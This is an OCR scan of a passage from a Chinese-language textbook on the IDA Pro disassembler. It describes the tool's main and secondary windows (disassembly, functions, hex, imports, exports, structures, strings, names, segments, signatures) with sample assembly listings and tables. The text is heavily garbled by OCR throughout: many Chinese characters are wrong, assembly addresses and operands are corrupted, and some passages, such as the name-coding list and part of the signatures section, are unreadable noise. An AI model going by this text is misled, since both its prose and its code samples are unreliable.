数 栈 指针 及 也 数 使 用 的 任何 栈 帧 指针 的 行为 进行 仔细 分 析 ， 从 而 计算 出 该 函数 的 栈 帆 的 结构 。 栈 
显示 将 在 第 6 章 详细 讨论 。 

位 置 @ 的 注释 ( 以 分 号 开头 ) 属于 交叉 引用 。 在 这 个 例子 中 , 我 们 看 到 的 是 代码 交叉 引用 (而 
不 是 数据 交叉 引用 )， 它 表示 为 一 个 程序 指令 将 控制 权 转 交 给 交 又 引用 注释 所 在 位 置 的 指令 。 交 
又 引 用 将 在 第 9 章 讨论 。 


IDA View-A 


P 

















gn" 











.text:004011B5 

.text:004011B5 ; === SUBROUTINE 
.text:004011B5 

.text:004011B5 ; Attributes: bp-based frame 
.text:004011B5 





.text:UUAU11B5 sub 4U11B5 proc near ; CODE XHEF: _maın+41 ir € 
.text:004011B5 
.text:004011B5 arg 0 = dword ptr 8 
.text:004011B5 aro 4@ = dword ptr OCh 
.text:004011B5 arg 8 = dword ptr 10h 
.text:004011B5 
*|.text:004011B5 push ebp 
*|.text:004011B6 mov ebp, esp 
*|.text:004011B8 mov ecx, [ebptarg 8] 
* |. text:004011BB mov edx, [ebp+arg 4] 
* |. text:004011BE mov eax, [ebp+arg 0] 
* |. text:004011C1 test ecx, ecx 
r----- *|.text:004011C3 | jz short loc 4011D1 
| e .text:004011C5 
1 .text:004011C5 Loo 4011C5: ; CODE XREF: sub 4011B5«1A p € 
| £777**|.text:004011c5 test edx, edx 
` polt .text:004011C7 jz short loc 4011CC 
e? *|.text:004011C9 dec eax 
i : 1 es.text:004011CRA jmp short loc 4011CD 
' | .text:004011CC ; -------------------------------------2-----------------2.-2.-.-----2-2------------- 
.text:004011CC 
I .text:004011CC loc 4011CC: ; CODE XREF: sub 4011854121; @ 
, E 77**].text:004011cc inc eax 
.text:004011CD 
.text:004011CD loc 4011CDb: ; CODE XREF: sub 4011854151; @ 
i * |. text:004011CD test ecx, ecx 
| w--2- j.text:004011CF jnz short loc 4011C*5 
i .text:004011D1 
| .text:004011Dl Loo 4011D1: ; CODE XREF: sub_4011B5+Et) € 
EC **].text:004011D1 pop ebp 
* |. text :004011D2 retn 
.text:004011D2 sub 4011B5 endp 


4 


000000C3 [004011C3: sub 4011B5+E v 
ele ?| 





lz A IDA 文 本 视图 
在 本 书 的 剩余 部 分 ， 我 们 将 主要 以 文本 显示 为 例 。 只 有 在 图 形 显 示 比 文本 显示 更 加 清楚 的 
情况 下 ， 我 们 才 会 用 到 图 形 显 示 。 在 第 7 草 ， 我 们 将 详细 介绍 文本 显示 ， 以 整理 和 注释 反 汇 编 














CD 栈 帧 〈 或 激活 记录 ) 是 在 程序 的 运行 时 栈 中 分 配 的 一 个 内 存 块 ， 其 中 包含 传递 给 一 个 函数 的 参数 和 该 函数 声明 的 
局 部 变量 。 栈 帧 在 函数 的 入 口 点 位 置 分 配 ， 并 在 函数 退出 时 释放 。 栈 帧 将 在 第 6 章 评 细 介 绍 。 
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5.1.2 ”函数 窗口 


Functions 窗 口 用 于 列举 IDA 在 数据 库 中 识别 的 每 一 个 也 数 ,Functions 窗 口中 的 条 上 日 如 下 所 示 : 





malloc .text ooBDC260 00000180 R. . . B... 


这 一 行 信 息 特 别 指出 : 用户 可 以 在 二 进 制 文件 中 虚拟 地 址 为 00BDC260 的 .text 部 分 找到 malloc 
PR 该 图 数 长 为 384 字 节 (十 六 进 制 为 180 字 节 )， 它 返回 调用 方 (R )， 并 使 用 EBP 寄 存 右 (B) 
引用 它 的 局 部 变量 。 如 需 了 解 更 多 有 关 用 于 描述 也 数 的 标记 ( 如 上 面 的 R 和 PB ) 的 信息 , 请 参阅 IDA 
的 内 部 帮助 文档 (或 右 击 一 个 函数 并 选择 Properties ， 标 记 将 以 可 编辑 的 复 选 框 显示 )。 

与 其 他 显示 窗口 一 样 , 双击 Functions 窗 口中 的 一 个 条 目 , 反 汇 编 窗口 将 跳 转 到 选 定 函 数 所 在 
的 位 置 。 











5.1.3 输出 窗口 


当 你 打开 一 个 新 文件 时 , IDA 工 作 区 的 部 的 输出 窗口 与 其 他 窗口 一 起 组 成 了 IDA 的 上 默认 衔 口 。 
输出 窗口 是 IDA 的 输出 控制 台 ， 从 中 可 以 找到 与 DA 所 执行 的 任务 有 关 的 信息 。 例 如 ， 当 你 初次 
打开 一 个 二 进 制 文件 时 ，IDA 将 生成 消息 ， 指 出 它 在 某 个 时 刻 所 处 的 分 析 阶 段 ， 以 及 它 为 创建 新 
数据 库 而 执行 的 操作 。 当 你 使 用 数据 库 时 ,输出 窗口 将 输出 你 所 执行 的 各 种 操作 的 状态 。 你 可 以 
将 输出 窗口 中 的 内 容 复 制 到 系统 豌 贴 板 中 , 也 可 以 右 击 窗口 的 任何 位 置 , 并 在 出 现 的 某 单 中 选择 
相应 的 操作 而 完全 删除 输出 窗口 的 内 容 。 通 常 ， 输 出 窗口 是 显示 你 为 IDA 开 发 的 任何 脚本 和 插件 
的 输出 的 主要 窗口 。 

















5.2 ”次 要 的 IDA 显示 窗口 


除 反 汇编 、 函 数 和 输出 窗口 外 ，IDA 还 在 条 面 上 打开 了 其 他 许多 选项 卡 式 的 和 窗口。 这些 选项 
卡 就 在 导航 带 下 面 ( 见 图 4-9 的 目 处 )。 这 些 窗 口 用 于 提供 备 选 或 专门 的 数据 库 视 图 。 是 否 使 用 这 
些 显 示 窗 口 ， 取 决 于 你 所 分 析 的 三 进 制 文件 的 特点 ， 以 及 你 应 用 IDA 的 询 练 程度 。 其 中 一 些 衔 口 
非常 特殊 ， 我 们 将 在 后 面 几 章 中 详细 介绍 。 














5.2.1 十 六 进 制 窗口 


将 这 个 窗口 称 做 “十 六 进 制 窗口 ”其 实 是 一 种 误 称 ， 因 为 IDA 十 六 进 制 窗口 可 以 配置 为 显示 各 
种 格式 ,并 可 作为 十 六 进 制 编辑 珊 使 用 。 和 殉 认 情况 下 , 十 六 进 制 窗口 显示 程序 内 容 和 列表 的 标准 十 
六 进 制 代码 ， 每 行 显示 16 个 字 节 ， 以 及 其 对 应 的 ASCI 字 符 。 和 在 反 汇 编 窗口 中 一 样 ， 用 户 也 可 以 
同时 打开 几 个 十 六 进 制 窗口 。 第 一 个 十 六 进 制 窗口 叫做 Hex View-A， 第 二 个 十 六 进 制 窗口 叫做 Hex 
View-B, 接 下 来 的 窗口 叫做 Hex View-C, 依次 类 推 。 默认 情况 下 ,第 一 个 十 六 进 制 窗 口 会 与 第 一 个 
肥 汇 编 窗 口 同 步 。 如 果 一 个 反 汇 编 窗 口 与 一 个 十 六 进 制 窗口 同步 , 在 一 个 窗口 中 滚动 鼠标 ,万 一 个 
窗口 也 会 滚动 到 相同 的 位 置 〈 同一 个 虚拟 地 址 )。 此 外 ， 如 果 在 反 汇编 窗口 中 选中 一 个 项 目 ， 十 六 




















5.2 次 要 的 IDA 显示 窗口 KE 


进 制 和 窗口 中 的 对 应 字 市 也 将 突出 显示 。 如 图 5-5 所 示 , ck, 26ENSIBIJIE0040108C, ix 
是 一 个 调用 指令 ， 那 么 ， 在 十 六 进 制 窗口 中 ， 构 成 这 个 指令 的 全 部 $ 个 字 节 均 突 出 显示 。 


9 |.text:D0401088 mow ecx, [ebprargc] 
* |. text: 00401008B push eox 
*|.text:0040108C call sub 401030 


TC C1 40 00 ES BE 07 00 DU 83 CA 08 8 01 | 4B LET S auc in 
D5 8B 45 FC EB DÀ ES 99 FF FF FF B8 DD ,.End.F. Td... 
8B E3 5D C3 55 8B EC 83 EC 10 CT 45 nn .S]TU.8.8.] E^... 
DD C7 45 FC 00 00 DD 00 8B 45 DC 5D na 


Eg SF FF FF F Edit... 6A D2 


op DO 83 CA 04 Ss 

on oo oo 99 sa Data format em 

Ap 00 E8 69 07 Columns op 

D2 OF 8584 91 OC Tex D AD 

E8 AB 07 00 0O E ee ci 

' 00 E8 21 07 Bee 33 
eynzhrarntrze vw 





由 DC401030:  maintzü 
图 5$-5 ”同步 的 十 六 进 制 窗口 和 反 汇 编 窗口 


为 外 ， 在 图 5-5 中 还 可 以 看 到 十 六 进 制 窗 口上 下 文 末 单 ， 右 击 十 六 进 制 窗 口 的 任何 位 置 ， 这 
个 亲 单 就 会 出 现 。 使 用 这 个 表单 ， 可 以 指定 与 某 个 特殊 的 十 六 进 制 窗 口 同 步 的 反 汇 编 窗 口 C 如果 
有 的 话 )。 如 果 取 消 选 中 同步 选项 ， 那 么 在 深 动 十 六 进 制 窗口 时 ， 将 不 会 有 任何 反 汇 编 窗 口 随 之 
深 动 。 选 择 Edit 末 单项 可 将 十 六 进 制 窗口 转变 为 十 六 进 制 编辑 妖 。 完 成 编辑 后 ， 你 必须 提交 或 取 
消 更 改 才能 返回 查看 模式 。 你 可 以 使 用 Data Format 菜 单项 选择 各 种 显示 格式 ， 如 1 、2、4、8 字 方 
十 六 进 制 ， 带 签名 的 十 进 制 ， 或 不 种 签名 的 十 进 制 整数 及 各 种 浮 点 格式 。 你 可 以 使 用 Columns 羔 
单项 更 改 显示 的 列 数 ， 使 用 Text 选 项 打开 或 天 闭 文 本 块 。 

有 时 候 ， 十 六 进 制 窗口 中 显示 的 全 部 是 问号 ， 这 表示 IDA 无 法 识别 给 定 的 虚拟 地 址 范围 内 的 
值 。 如 果 程 序 中 包含 一 个 bss 节 "， 就 会 出 现 这 种 情况 。 通 常 ，bss 节 并 不 占用 文件 的 空间 ， 但 加 载 
需 会 扩展 这 一 节 ， 以 适应 程序 的 静态 存储 要 求 。 


5.2.2 导出 窗口 


导出 窗口 列 出 文件 的 入口 点 。 这 包括 程序 的 执行 入口 点 〈 在 程序 的 文件 头 部 分 指定 )， 以 及 
任何 由 文件 导出 给 其 他 文件 使 用 的 函数 和 变量 。 通 常 ， 用 户 可 在 共 至 库 ( 如 Windows DLL 文件 ) 
中 找到 导出 的 孔 数 。 导 出 的 项 目 按 名 称 、 虚 拟 地 址 和 序数 ”( 如 果 可 用 ) 排列 。 对 于 可 执行 文件 ， 
导出 窗口 中 至 少 包含 一 个 项 目 : 程序 的 执行 人 口 点 。 IDA 将 这 个 入 口 点 取 名 为 start。 导 出 窗口 中 
的 第 见 条 上 日 如 下 所 示 : 









































(D bss 节 由 编译 器 创建 ， 用 于 保存 程序 的 所 有 未 初始 化 的 静态 变量 。 既 然 没 有 为 这 些 变量 指定 初始 值 , 那么 ,就 没有 
必要 在 程序 的 文件 镜像 中 为 它们 分 配 空间 ; 只 需 在 程序 的 一 个 头 文件 中 注 明 它 的 大 小 。 当 程序 执行 时 ， 加 载 需 会 
为 其 分 配 所 需 的 空间 ， 并 将 整个 数据 块 的 初始 值 设 为 0。 

D 共享 库 可 能 会 使 用 导出 序数 ， 以 方便 用 户 通 过 序数 而 非 名 称 访问 旺 数 。 使 用 序数 可 以 加 快 地 址 查询 速度 ， 并 人 允许 
程序 员 隐 藏 图 数 的 名 称 。Windows DLL 即使 用 导出 序数 。 
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LoadLibraryA 7C801D77 578 





与 许多 其 他 IDA 窗 口 一 样 ， 双 击 导 出 窗口 中 的 一 个 条 日，IDA 将 会 跳 转 到 反 汇 编 窗 口中 与 该 
项 目 有 关 的 地 址 。 导 出 窗口 提供 与 objdump (-T), readelf (-s) 和 dumpbin (/EXPORTS) 等 命令 行 工 
具 类 似 的 功能 。 


5.2.3 ”导入 窗口 


导入 和 窗口 的 功能 与 导出 窗口 的 功能 正好 相反 。 它 列 出 由 被 分 析 的 三 进 制 文件 时 入 的 所 有 骆 
数 。 只 有 在 二 进 制 文件 使 用 共 盏 库 时 ，IDA 才 需要 用 到 导 和 人 窗口。 静态 链接 的 二 进 制 文件 不 存在 
外 部 依赖 关系 ,因此 不 需要 导入 其 他 内 容 。 导 和 人 窗口 中 的 每 个 条 目 列 出 一 个 导入 项 目 〈 函数 或 数 
据 ) 的 名 称 ， 以 及 包含 该 项 目的 库 的 名 称 。 由 于 被 导 和 人 的 函数 的 代码 位 于 共 圣 库 中 ,窗口 中 每 个 
条 目 列 出 的 地 址 为 相关 导入 表 条 目 " 的 虚拟 地 址 。 以 下 是 导入 窗口 中 的 一 个 条 目 : 











0040E108  GetModuleHandleA KERNEL32 





双击 这 个 条 目 ，IDA 将 跳 转 到 反 汇 编 窗口 的 0040E108 地 址 处 。 在 十 六 进 制 窗 口中 ， 这 个 内 存 
位 置 的 内 容 显示 为 ?? ?? ?? ?3?。IDA 是 一 种 静态 分 析 工 具 ， 它 无 法 获知 程序 在 执行 时 会 在 这 个 内 
存 位 置 输入 什么 地 址 。 导 入 窗口 还 提供 与 objdump (-T) 、readelf (-S) 和 dumpbin (/IMPORTS) 等 命 
令 行 工 具 类 似 的 功能 。 

对 于 导入 窗口 ,需要 记 住 的 一 点 是 : 寻 和 窗口 仅 显 示 二 进 制 文件 想 要 劲 态 加 载 带 日 动 处 理 的 
符号 ,二进制 文件 选择 使 用 dilopen/dlsym 或 LoadLibrary/GetProcAddress 等 机 制 自行 加 载 的 符号 将 
不 会 在 导入 窗口 中 显示 。 


5.2.4 ”结构 体 窗口 


结构 体 窗口 用 于 显示 IDA 决 定 在 一 个 二 进 制 文件 中 使 用 的 任何 复杂 的 数据 结构 ( 如 C 结 构 体 和 
联合 ) 的 布局 。 在 分 析 阶 段 ，IDA 会 查询 它 的 蚂 数 类 型 签名 扩展 库 ， 设法 将 哨 数 的 参数 类 型 与 程序 
使 用 的 内 存 匹配 起 来 。 如 图 $-6 所 示 的 结构 体 窗口 表明 ，IDA 认 为 程序 使 用 了 sockaddr2 数 据 结构 。 

















Structures E 
1 

00000000 ; Ins/Del : create/delete structure 

00000000 ; D/A/* : create structure member (data/ascii/array) 


: rename structure or structure member 


D 
N 
nnnnnnnn :; T : delete strnotnre member 
ID ; [00000010 BYTES. COLLAPSED STRUCT sockaddr. PRESS KEYPAD 


| 1. sockaddr-0000 T 
» | 





图 $-6 “结构 体 窗 口 


D 导入 表 为 加 载 器 提供 空间 ， 用 于 在 加 载 所 需 的 库 并 获知 导入 函数 的 地 址 后 保存 导入 函数 的 地 址 。 一 个 导入 表 条 目 
保存 一 个 导入 函数 的 地 址 。 

(2) sockaddr 结 构 是 C 标 准 库 中 的 一 种 数据 类 型 , 常用 于 表示 网 络 连接 中 的 一 个 端点 。 在 与 远程 计算 机 建立 TCP 连 接 时 , 
sockaddr 变 量 可 用 于 保存 下地 址 和 端口 号 。 
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至 于 IDA 为 什么 会 得 出 这 样 的 结论 ， 可 能 有 许多 原因 。 其 中 一 个 原因 是 : IDA 发 现 ， 程 序 为 
建立 新 的 网 络 连 接 调 用 了 C 库 函数 connect"。 双 击 数据 结构 的 名 称 (本 例 中 为 Sockaddr )，IDA 将 
展开 该 结构 ， 这 样 你 就 可 以 查看 该 结构 的 详细 布局 ， 包 括 每 个 字段 的 名 称 和 大 小 。 

结构 体 窗口 的 两 个 主要 用 途 包 括 : 为 标准 数据 结构 的 布局 提供 现成 的 参考 ; 为 你 提供 一 种 方 
法 , 在 你 发 现 程序 使 用 的 自 定义 数据 结构 时 ,帮助 你 创建 自己 的 、 可 用 作 内 存 布局 模板 的 数据 结 
构 。 我 们 将 在 第 8 章 详细 讨论 结构 体 的 定义 及 结构 体 在 反 汇 编 过 程 中 的 应 用 。 














5.2.5 KAO 


枚 举 窗 口 有 点 类 似 于 结构 体 窗口 。 如 果 IDA 检 测 到 标准 枚 举 数据 类 型 (C enum), CRER 
举 窗 口中 列 出 该 数据 类 型 。 你 可 以 使 用 枚 举 来 代 符 整数 肖 量 ， 提 高 反 汇 编 代码 的 可 读 性 。 像 结 
构 体 窗口 一 样 ， 在 枚 举 窗口 中 也 可 以 定义 目 己 的 枚 举 类 型 ， 并 将 其 用 在 经 过 反 汇 编 的 二 进 制 代 
位 中 Oo 
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最 后 ， 我 们 讨论 默认 情况 下 IDA 不 会 打开 的 窗口 。 这 里 讨论 的 每 一 个 窗口 都 可 通过 
View >» Open Subviews 命 令 打开 。 但 是 ， 它 们 提供 的 并 不 是 你 当前 需要 的 信息 ， 因 此 ，IDA 一 开 
始 并 不 打开 这 些 窗口 。 





5.3.1 Strings 窗 口 


Strings 窗 口 是 IDA 中 内 置 的 , 功能 等 同 于 strings 及 其 他 一 些 实 用 工具 。 在 IDA 5.1 及 之 前 的 版 
本 中 ， 桌 面 默 认 打 开 Strings 窗 口 。 但 是 ， 从 .2 版 开始 ，IDA 不 再 默认 打开 Strings 窗 口 ， 不 过 用 户 
仍然 可 以 通过 View >» Open Subviews ”Strings 命 令 打 开 该 窗口 。 

Strings 窗 口中 显示 的 是 从 二 进 制 文件 中 提取 出 的 一 组 字符 串 ， 以 及 每 个 字符 串 所 在 的 地 址 。 与 
双击 Names 窗 口中 的 名 称 得 到 的 结果 类 似 ， 双 击 Strings 窗 口中 的 任何 字符 串 ， 反 汇编 窗口 将 跳 转 到 
该 字符 串 所 在 的 地 址 。 将 Strings 窗 口 与 交叉 引用 (第 9 章 将 介绍 ) 相 结 合 ， 可 迅速 定位 你 感 兴趣 的 
字符 串 ， 并 追踪 到 程序 中 任何 引用 该 字符 串 的 位 置 。 例 如 ， 你 可 能 会 看 到 SOFTWARENMicrosofh 
Windows\CurrentVersion\Run 这 个 字符 串 ， 并 想 知 道 应 用 程序 为 什么 会 引用 这 个 特殊 的 Windows 注 册 
KR, 在 下 一 革 中 你 会 发 现 , 导航 到 引用 这 个 字符 串 的 程序 位 置 , 只 需要 单 击 4 下 鼠标 。 擎 握 Strings 
窗口 的 操作 ， 是 高 效应 用 这 个 窗口 的 基础 能 力 。IDA 并 不 会 永久 保存 它 从 二 进 制 文件 中 提取 出 的 
字符 串 。 因 此 ， 每 次 打开 Strings 窗 口 ，IDA 都 会 扫 摘 或 重新 扫 朱 整个 数据 库 ， 查 找 其 中 的 字符 串 。 
扫描 字符 串 的 操作 吕 照 Strings 窗 口 的 设置 来 完成 ， 右 击 该 窗口 ， 在 出 现 的 六 单 中 选择 Setugp， 即 可 
开始 设置 。 如 图 5-7 所 示 ，Setup Strings 窗 口 用 于 指定 IDA 应 扫 摘 的 字符 串 类 型 。IDA 默 认 扫 摘 的 字 
符 串 类 型 为 至 少 包含 5 个 字符 的 C 风 格 、 以 nul1 结 尾 的 7 位 ASCH 字 符 串 。 









































(D int connect(int sockfd, const struct sockaddr *serv addr, socklen t addrlen):, 
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Setup strings window EE 
ist setup 
厂 Display only defined strings 

[ Ignore instructions/data definitions 
[v Strict ASCII (7-bit) strings 





[ Pascal, 2 byte length 


[ Unicode 

[ Pascal, 4byte length 

[ Pascal style Unicode, 2 byte length 
[ Pascal style Unicode, 4 byte length 


图 $-7 Setup Strings 窗 口 


如 果 和 希望 在 字符 串 窗口 中 显示 除 C 风 格 字 符 串 以 外 的 字符 串 ， 你 需要 重新 配置 Setup Strings 窗 
O, 从 中 选择 IDA 扫 描 的 相应 字符 串 类 型 ,例如 , Windows 程 序 通 常会 使 用 Unicode 字 符 串 , 而 Borland 
Delphi 二 进 制 文件 则 往往 使 用 2 个 字 节 长 的 Pascal] 字 符 串 。 每 次 你 单 击 OK 按钮 关闭 Setup Strings O 
后 ，IDA 都 会 根据 新 的 设置 重新 扫描 数据 库 ， 查 找 相应 的 字符 串 。 有 两 个 设置 选项 值得 特别 注意 。 

Display only defined strings《〈 仅 显示 已 定义 的 字符 串 ) 。 这 个 选项 使 Strings 窗 口 仅 显示 IDA 
自动 创建 或 用 户 手 动 创建 的 已 命名 字符 串 数据 项 。 在 选中 这 个 选项 的 同时 禁用 所 有 其 他 选项 ， 
IDA 将 不 会 日 动 扫 描 其 他 类 型 的 字符 串 。 

Ignore instructions/data definitions (忽略 指令 /数据 定义 )。 这 个 选项 会 使 IDA 扫 描 指 令 和 
现 有 数据 定义 中 的 字符 串 。 使 用 这 个 选项 ， 可 以 让 IDA 扫 描 二 进 制 代码 中 错误 地 转换 成 指令 的 字 
符 串 ,或 扫描 数据 中 非 字 符 串 格式 ( 如 字 节 数组 或 整数 ) 的 字符 串 。 这 个 选项 还 会 导致 IDA 生 成 
许多 垃圾 字符 串 ， 即 那些 由 5 个 或 更 多 ASCII 字 符 构 成 的 字符 串 ( 无论 其 是 否 合法 )。 使 用 这 个 选 
项 的 效果 类 似 于 使 用 strings -a 命令 。 

如 图 5-8 所 示 ,如果 没有 正确 配置 字符 串 设置 ,IDA 不 一 定 会 显示 二 进 制 文件 中 的 所 有 字符 串 。 
在 这 种 情况 下 ， 用 户 并 没有 选中 Ignore instructions/data definitions 选 项 。 






















































.rdata:0040C180 aASimpleGuessin db ' simple guessing game!',0Ah,0 ; DATA XREF:  mains49To 

Bi rdata:0040C199 align 4 

*l.rdata:0040C19C dword 40C19C dd 61656C50h, 67206573h, 73736575h, 6E206120h, 65626D75h 
.rdata:0040C19C ; DATA XREF:  main*671o 
.rdata:0040C19C dd 65622072h, 65657774h, 2031206Eh, 20646E61h, 0A2E6425h 

* |.rdata:0040C1C4 dd 0 

9j].rdata:0040C1C8 ; char aD[] 
.rdata:0040C1C8 aD db '$&d',O0 ; DATA XREF: _main+78fo 

eI. rdata:0040C1CB align 4 

eI. rdata:0040C1CC alnvalidInputQu db 'Invalid input, quitting! ',0Ah,0 





. rc 
Strings window 
rc 























ciiis] .rdata:0040... 00000019 E A simple guessing game! \n 
图 .rdata:0040... 0000001A C Invalid input, quitting! i 


Fei .rdata:0040... 0000002F C Congratulations, you got it in %d attempt(s)!ln 











K[5-8 ”不 扫描 字符 串 数据 的 情况 
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结果 ，IDA 并 不 扫描 位 置 .rdata:0040C19C 处 的 字符 串 ( "Please guess a number between 1 and 
%d.”)。 这 个 选项 的 作用 是 确保 IDA 会 在 所 有 可 能 发 现 字 符 串 的 地 方 扫描 各 种 类 型 的 字符 串 。 
5.3.2 Names 窗 口 

Names 和 窗口 如 图 $-9 所 示 ， 它 简要 列举 了 一 个 二 进 制 文件 的 所 有 全 局 名 称 。 名 称 是 指 对 一 个 程 
序 虚 拟 地 址 的 符号 描述 。 丰 最初 加 载 文 件 的 过 程 中 ，IDA 会 根据 符号 表 和 签名 分 析 派 生出 名 称 列 
表 。 名 称 可 以 按 字 母 排 序 ， 也 可 以 按 虚 拟 地 址 排序 (升序 或 降序 ) 用 户 可 通过 Names 窗 口 迅速 导 
航 到 程序 列表 中 的 已 知 位 置 。 双 击 Names 窗 口中 的 名 称 ， 可 立即 跳 转 到 显示 该 名 称 的 反 汇 编 视图 。 














x] 
El 
Deag 
; main : 00401070 
EB ` amsg exit 00401181 
2H] ` crtCorExitProcess UJ 11A5 
ES — crtExitProcess D04011CB 
| fl au: 004011DF 
di —lockexit D04011E0 
. unlockexit ü04011E9 
` jnitterm 004011F2 
. initberm e 00401204A 
dnit 00401290 
E| _doexit 0040132F 
| 14] 所 N15 00401300 
Viil ana U03013H9 
| 14] aus 004013FC 
ji] &N14 0040140A Cl 
k 





Line 1 of 680 





图 5-9 ”Names 窗 口 





Names 和 窗口 中 显示 的 名 称 采 用 了 颜色 和 字母 编码 。 其 编码 方案 总 结 如 下 。 
OF, WMZ IDAN AXE KR E FE KZ 
OL, EKU IDAGBE EAE 4A VG POTE D OEYA BE RZ WREE RREA ETTE, WU 
该 函数 将 被 标记 为 常规 函数 。 
口 |， 导入 的 名 称 ， 通 第 为 共享 库 导 和 的 函数 名 称 。 它 与 库 困 数 的 区 别 在 于 : 导入 的 名 称 没 
有 代码 ， 而 库 函 数 的 主体 将 在 反 汇 编 代码 清单 中 显示 。 
口 C， 命 名 代码 。 这 些 是 已 命名 的 程序 指令 位 置 ，IDA 认 为 它们 不 属于 任何 函数 。 当 IDA 在 
程序 的 符号 表 中 找到 一 个 名 称 ， 但 没 发 现 对 程序 位 置 的 任何 调用 时 ， 就 会 出 现 这 种 情况 。 
DD， 数 据 。 已 命名 数据 的 位 置 通 常 表示 全 局 变量 。 
D 口 A， 字 符 串 数据 。 这 是 一 个 被 引用 的 数据 位 置 ， 其 中 包含 的 一 串 字符 符合 IDA 的 某 种 已 知 
的 字符 串 数据 类 型 ， 如 以 '\0' 字 节 结 束 的 ASCIIC 字符 串 。 
浏览 反 汇 编 代 码 清 单 时 ,你 会 注意 到 ， 其 中 许多 已 命名 的 位 置 在 Named 窗 口中 并 没有 对 应 的 
名 称 。 在 对 一 个 程序 进行 反 汇 编 的 过 程 中 ，IDA 会 为 所 有 直接 作为 代码 (分 支 或 调用 目标 ) 或 数 
据 ( 读 取 的 、 写 和 人 的 或 使 用 的 地 址 ) 引用 的 位 置 生成 名 称 。 如 果 一 个 位 置 已 在 程序 符号 表 中 命名 ， 
IDA 将 采用 该 名 称 。 如 果 符 号 表 中 某 一 程序 位 置 没 有 名 称 ， 则 IDA 会 生成 一 个 默认 的 名 称 ， 以 在 
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反 汇 编 过 程 中 使 用 。 在 IDA 给 某 个 位 置 命名 时 ， 它 会 使 用 该 位 置 的 虚拟 地 址 和 一 个 表示 该 位 置 的 
类 型 的 前 级 进行 命名 。 将 虚拟 地 址 合并 到 生成 的 名 称 中 ， 可 确保 生成 的 所 有 名 称 的 唯一 性 ， 因 为 
没有 两 个 位 置 的 虚拟 地 址 是 相同 的 。 这 种 目 动 生成 的 名 称 并 不 在 Names 答 口中 显示 。 用 于 目 动 生 
成 名 称 的 一 些 常 用 前 级 包括 以 下 这 些 。 

O sub xxxxxx: 地 址 xxxxxx 处 的 子 例 程 。 

O loc »»ooox: 地 址 xxxxxx 处 的 一 个 指令 。 

O byte 2000X: 位 置 xxxxxx 处 的 8 位 数据 。 

O word »»oox: 位 置 xxxxxx 处 的 16 位 数据 。 

O dword _xxxxxx: 位 置 xxxxxx 人 处 的 32 位 数据 。 

O unk_xxxxxx: 位 置 xxxxxx 处 的 大 小 未 知 的 数据 。 

在 本 书 的 剩余 部 分 ， 我 们 还 将 介绍 IDA 用 于 为 程序 数据 位 置 选择 名 称 的 其 他 算法 。 
5.3.3 BS 

段 窗 口 显 示 的 是 在 二 进 制 文 件 中 出 现 的 段 的 简要 列表 。 需要 注音 的 在 , 在 讨论 二 进 制 文件 的 
结构 时 ，IDA 术 语 段 ( segment ) 常 称 为 节 ( section )。 请 不 要 将 这 里 的 术语 段 与 实施 分 段 内 存 体 
系 结构 的 CPU 中 的 内 存 段 混 消 。 该 窗口 中 显示 的 信息 包括 段 名 称 、 起 始 和 结束 地 址 以 及 许可 标志 。 
起 始 和 结束 地 址 代表 程序 段 在 运行 时 对 应 的 虚拟 地 址 旋 围 。 下 面 是 IDA 在 分 析 一 个 Windows 二 进 
制 文件 时 显示 的 段 窗 口 : 

Name Start End RWXDL Align Base Type Class AD es ss ds fs gs 

UPXO | 00401000 00407000 RW X . L para 0001 public CODE 32 0000 0000 0001 FFFFFFFF FFFFFFFF 

UPX1 00407000 00408000 RW X . L para 0002 public CODE 32 0000 0000 0001 FFFFFFFF FFFFFFFF 

UPX2 00408000 00408080 R W. . L para | 0003 public DATA 32 0000 0000 0001 FFFFFFFF FFFFFFFF 


.idata 0040803C 00408050 RW . . L para 0003 public XTRN 32 0000 0000 0001 FFFFFFFF FFFFFFFF 
UPX2 00408050 00409000 RW . . L para 0003 public DATA 32 0000 0000 0001 FFFFFFFF FFFFFFFF 


从 上 面 的 例子 可 以 立即 发 现 这 个 特殊 的 二 进 制 文件 有 点 奇怪 ， 因 为 它 使 用 了 非 标准 的 段 和 名 
P, 并 包含 两 个 可 写 入 的 可 执行 代码 段 ， 这 表示 它们 可 能 是 自修 改 代 码 ( 更 多 内 容 将 在 第 21 章 讨 
论 )。 即 使 IDA 知 道 段 的 大 小 ， 也 不 能 表明 它 知道 该 段 的 内 容 。 由 于 各 种 原因 ， 段 占用 的 磁盘 空 
间 比 内 存 空 间 小 得 多 。 在 这 些 情况 下 ，IDA 会 显示 它 已 经 确定 能 够 从 磁盘 文件 中 提取 的 段 部 分 的 
值 ， 至 于 段 的 其 他 部 分 ， 它 会 以 问号 显示 。 

双击 段 窗 口中 的 任何 条 目 , IDA 将 跳 转 到 反 汇 编 窒 口中 该 段 的 起 始 位 置 。 右 击 一 个 条 目 , IDA 
将 显示 一 个 上 下 文 末 单 ， 你 可 以 选择 添加 新 段 、 删 除 现 有 上 段 、 或 者 编辑 现 有 上 段 的 属性 。 在 对 非 标 
准 格式 的 文件 进行 赣 癌 工程 时 ， 这 些 功能 特别 有 用 ， 因 为 二 进 制 文件 的 段 结 构 可 能 还 没有 被 IDA 
加 载 需 检测 出 来 。 

段 窗口 所 对 应 的 命令 行 工 具 包 括 objdump (-h), readelf (-s) 和 dumpbin (/HEADERS) 。 


5.34 ”签名 窗口 
IDA 利 用 一 个 庞大 的 签名 库 来 识别 已 知 的 代码 块 。 签 名 用 于 识别 由 编 详 肖 生成 的 稼 用 局 动 顺 
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序 , Exe REC KHR EA XE —X EIC TERI ERE S MEA XP HI TRE eg rel A P Zi Pei 
入 的 已 知 库 函数 ， 或 者 因为 静态 链接 而 添加 到 二 进 制 文件 中 的 函数 。 在 IDA 为 你 识别 库 函 数 时 ， 
你 可 以 将 更 多 精力 放 在 分 析 IDA 无 法 识别 的 代码 上 ( 对 你 而 言 ， 这 可 能 比 对 printf 的 内 部 工作 机 
制 进行 逆 回 工程 更 加 有 趣 )。 

签名 窗口 显示 的 是 IDA 对 打开 的 二 进 制 文 件 所 使 用 的 签名 。Windows PE 文件 的 签名 窗口 的 示 
例如 下 所 示 : 








File State #func Library name 
vc32rtf Applied 501 Microsoft VisualC 2-8/net runtime 


这 个 例子 表明 ,IDA 已 对 该 二 进 制 文件 应 用 了 vc32rtf 签 名 (来 自 <IDADIR>/sigs 目 录 )， 并 在 
这 个 过 程 中 将 $01 个 函数 识别 为 库 困 数 。 你 不 需要 对 这 S$01 个 另 数 进行 逆 回 工程 处 理 。 

